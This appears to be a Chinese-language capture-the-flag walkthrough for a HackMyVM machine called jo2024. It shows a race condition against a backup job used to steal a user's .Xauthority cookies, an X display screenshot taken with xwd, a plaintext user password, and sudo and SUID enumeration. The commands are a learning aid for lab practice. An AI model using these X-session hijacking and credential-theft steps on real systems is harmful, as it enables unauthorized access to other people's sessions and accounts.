2024/12/19 01:53:34 CMD: UID=0     PID=34     | 
2024/12/19 01:53:34 CMD: UID=0     PID=33     | 
2024/12/19 01:53:34 CMD: UID=0     PID=32     | 
2024/12/19 01:53:34 CMD: UID=0     PID=31     | 
2024/12/19 01:53:34 CMD: UID=0     PID=30     | 
2024/12/19 01:53:34 CMD: UID=0     PID=29     | 
2024/12/19 01:53:34 CMD: UID=0     PID=28     | 
2024/12/19 01:53:34 CMD: UID=0     PID=27     | 
2024/12/19 01:53:34 CMD: UID=0     PID=25     | 
2024/12/19 01:53:34 CMD: UID=0     PID=24     | 
2024/12/19 01:53:34 CMD: UID=0     PID=23     | 
2024/12/19 01:53:34 CMD: UID=0     PID=22     | 
2024/12/19 01:53:34 CMD: UID=0     PID=21     | 
2024/12/19 01:53:34 CMD: UID=0     PID=20     | 
2024/12/19 01:53:34 CMD: UID=0     PID=18     | 
2024/12/19 01:53:34 CMD: UID=0     PID=16     | 
2024/12/19 01:53:34 CMD: UID=0     PID=15     | 
2024/12/19 01:53:34 CMD: UID=0     PID=14     | 
2024/12/19 01:53:34 CMD: UID=0     PID=13     | 
2024/12/19 01:53:34 CMD: UID=0     PID=12     | 
2024/12/19 01:53:34 CMD: UID=0     PID=11     | 
2024/12/19 01:53:34 CMD: UID=0     PID=10     | 
2024/12/19 01:53:34 CMD: UID=0     PID=6      | 
2024/12/19 01:53:34 CMD: UID=0     PID=5      | 
2024/12/19 01:53:34 CMD: UID=0     PID=4      | 
2024/12/19 01:53:34 CMD: UID=0     PID=3      | 
2024/12/19 01:53:34 CMD: UID=0     PID=2      | 
2024/12/19 01:53:34 CMD: UID=0     PID=1      | /sbin/init splash 
...

看样子就是定时任务了，把 vanity 的文件备份到 /backup 目录下，然后验证 md5，如果不一样就输出 MD5 mismatch for $srcfile。然后 chmod 700 $destfile。

直接条件竞争出来

www-data@jo2024:/home/vanity$ while true; do cat .Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done
<Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done

www-data@jo2024.hmv:/tmp$ ./busybox xxd log
00000000: 0100 0006 6465 6269 616e 0002 3131 0012  ....debian..11..
00000010: 4d49 542d 4d41 4749 432d 434f 4f4b 4945  MIT-MAGIC-COOKIE
00000020: 2d31 0010 e23e 37c8 0ab2 4558 4a5b f010  -1...>7...EXJ[..
00000030: c6d3 6685 0100 0006 6465 6269 616e 0001  ..f.....debian..
00000040: 3000 124d 4954 2d4d 4147 4943 2d43 4f4f  0..MIT-MAGIC-COO
00000050: 4b49 452d 3100 10f9 9d8e bcf0 f56d 8f00  KIE-1........m..
00000060: 036c 4aac edb2 0c01 0000 0a6a 6f32 3032  .lJ........jo202
00000070: 342e 686d 7600 0130 0012 4d49 542d 4d41  4.hmv..0..MIT-MA
00000080: 4749 432d 434f 4f4b 4945 2d31 0010 a4d5  GIC-COOKIE-1....
00000090: 7190 b1f2 25fe f8e4 28c8 959e b4f2 0100  q...%...(.......
000000a0: 0006 6465 6269 616e 0002 3131 0012 4d49  ..debian..11..MI
000000b0: 542d 4d41 4749 432d 434f 4f4b 4945 2d31  T-MAGIC-COOKIE-1
000000c0: 0010 e23e 37c8 0ab2 4558 4a5b f010 c6d3  ...>7...EXJ[....
000000d0: 6685 0100 0006 6465 6269 616e 0001 3000  f.....debian..0.
000000e0: 124d 4954 2d4d 4147 4943 2d43 4f4f 4b49  .MIT-MAGIC-COOKI
000000f0: 452d 3100 10f9 9d8e bcf0 f56d 8f00 036c  E-1........m...l
00000100: 4aac edb2 0c01 0000 0a6a 6f32 3032 342e  J........jo2024.
00000110: 686d 7600 0130 0012 4d49 542d 4d41 4749  hmv..0..MIT-MAGI
00000120: 432d 434f 4f4b 4945 2d31 0010 a4d5 7190  C-COOKIE-1....q.
00000130: b1f2 25fe f8e4 28c8 959e b4f2            ..%...(.....
www-data@jo2024.hmv:/tmp$ xauth -f log     
Using authority file log
xauth> list
debian/unix:11  MIT-MAGIC-COOKIE-1  e23e37c80ab245584a5bf010c6d36685
debian/unix:0  MIT-MAGIC-COOKIE-1  f99d8ebcf0f56d8f00036c4aacedb20c
jo2024.hmv/unix:0  MIT-MAGIC-COOKIE-1  a4d57190b1f225fef8e428c8959eb4f2
debian/unix:11  MIT-MAGIC-COOKIE-1  e23e37c80ab245584a5bf010c6d36685
debian/unix:0  MIT-MAGIC-COOKIE-1  f99d8ebcf0f56d8f00036c4aacedb20c
jo2024.hmv/unix:0  MIT-MAGIC-COOKIE-1  a4d57190b1f225fef8e428c8959eb4f2
xauth> 
www-data@jo2024.hmv:/tmp$ export XAUTHORITY=/tmp/log            
www-data@jo2024.hmv:/tmp$ xwd -root -screen -silent -display :0 > screenshot.xwd
www-data@jo2024.hmv:/tmp$ python3 -m http.server 8888

然后就可以得到对应的screenshot

vanity:xd0oITR93KIQDbiD

vanity@jo2024:~$ sudo -l
Matching Defaults entries for vanity on jo2024:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vanity may run the following commands on jo2024:
    (ALL : ALL) NOPASSWD: /usr/local/bin/php-server.sh
vanity@jo2024:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/ntfs-3g
/usr/bin/passwd
/usr/bin/su
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/mount
/usr/sbin/userhelper
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/xscreensaver/xscreensaver-auth
vanity@jo2024:~$ id
uid=1000(vanity) gid=1000(vanity) groups=1000(vanity),100(users)
vanity@jo2024:~$ groups
vanity users
vanity@jo2024:~$ cat /usr/local/bin/php-server.sh
#!/bin/bash

/usr/bin/php -t /opt -S 0.0.0.0:8000
vanity@jo2024:~$ 

启动起来访问

网络里看到包

直接有了